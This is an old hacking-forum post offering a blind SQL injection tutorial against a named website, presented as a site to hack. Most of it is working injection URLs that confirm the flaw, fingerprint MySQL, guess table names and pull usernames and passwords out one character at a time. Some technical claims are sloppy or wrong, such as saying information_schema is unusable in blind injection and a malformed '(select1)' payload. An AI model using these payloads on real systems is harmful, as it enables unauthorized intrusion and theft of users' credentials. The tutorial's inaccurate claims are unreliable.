__Dj_-k1ll3r__
Super Moderator
Posts : 63
Points : 187
Reputation : 0
Join date : 2011-07-18
 | | Subject: Blind SQL Injection (tutorial) Thu Jul 21, 2011 8:02 pm | |
| Blind SQL Injection
The dorks to find vulnerable websites are exactly the same with SQL Injection.
Let's say the site we want to hack is: http://www.nextlive.com/
We surf to the site until we go somewhere like this:
http://www.nextlive.com/page.php?id=18
To see if the site is vulnerable in SQL Injection we write " ' " at the end of the URL.
For Blind SQL Injection it's different. We write at the end of URL "and 1=1"
http://www.nextlive.com/page.php?id=18 and 1=1
Of course the "and 1=1" is valid. So we must write something that is invalid to see if the site is vulnerable.
Putting in the end of the URL "and 1=2" the site will not load normally. That means that the site is vulnerable.
Now to check what version the above website we write the command "and substring(@@version,1,1)=4"
http://www.nextlive.com/page.php?id=18 and substring(@@version,1,1)=4
The site doesn't load normally. That means that the website is not running version 4.
If we change 4 to 5 :
http://www.nextlive.com/page.php?id=18 and substring(@@version,1,1)=5
The page loads normally. Now we now that the website is running SQL 5!
Another command that we should use is "and (select1)=1":
http://www.nextlive.com/page.php?id=18 and (select1)=1
If the page loads normal means thatwe can use the command Select.
Now let's see if we have access to mysql.user. We write "and (SELECT 1 from mysql.user limit 0,1)=1 :
http://www.nextlive.com/page.php?id=18 and (SELECT 1 from mysql.user limit 0,1)=1
The page must load normally.
Now let's try to find the tables-columns and then the passwords we want!
Note: In Blind SQLi the only thing we get is positive or negative response.
That means that we can't use information_schema in SQL 5 to find the data we want. We must guess.
With the command "and (SELECT 1 from users limit 0,1)=1" we check if the table users exists.
So we have the following URL:
http://www.nextlive.com/page.php?id=18 and (SELECT 1 from users limit 0,1)=1
The page doesn't load normally. That means that this table doesn't exist!
Now I will put as table "tbl_accounts". So the URL will be:
http://www.nextlive.com/page.php?id=18 and (SELECT 1 from tbl_accounts limit 0,1)=1
And yes we got positive response! Now we must search for columns in that table.
http://www.nextlive.com/page.php?id=18 and (SELECT substring(concat(1,acc_password),1,1) from tbl_accounts limit 0,1)=1
and
http://www.nextlive.com/page.php?id=18 and (SELECT substring(concat(1,acc_username),1,1) from tbl_accounts limit 0,1)=1
We got 2 positive responses so we know that the columns acc_username and acc_password exist!
Now we are going to get data from those columns! Remember, here it will take us a long time to get data from the database.
We will work with ascii characters. To see them you can go here:
http://www.asciitable.com/
With the command: and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>ascii value
We select the user with number UserID 1.
But since our attack is "blind" we said that we will work with ascii characters to guess the password!
Where we put ascii value we put a character in ascii with (DEC) format number.
So if we write:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>20
We will get positive response. But we continue until we get negative response. What I mean is that we will increase the value 20 that we put and we will stop until we get negative response.
We try:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>30
Positive! We increase:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>40
Positive! We increase:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>60
Positive! We increase:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>100
Negative! That means that now We decrease:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>95
Positive! We increase:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>96
Positive! We increase:
http://www.nextlive.com/page.php?id=18 and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),1,1))>97
Negative!
We know the character(ascii) is bigger than 96 but not bigger then 97!
If we go to the website I gave you before we will see that 97 is character "a"
If now we change the command to:
and ascii(substring((SELECT concat(acc_username,0x3a,acc_password) from tbl_accounts where acc_id=1),2,1))>ascii value
(we changed from "where acc_id=1),1,1))> to "where acc_id=1),2,1))>
We put it to check the second character. And we work with the same way.
Note:
That a website is not vulnerable to SQL Injection does NOT mean that it's not to Blind SQL Injection! | |
|
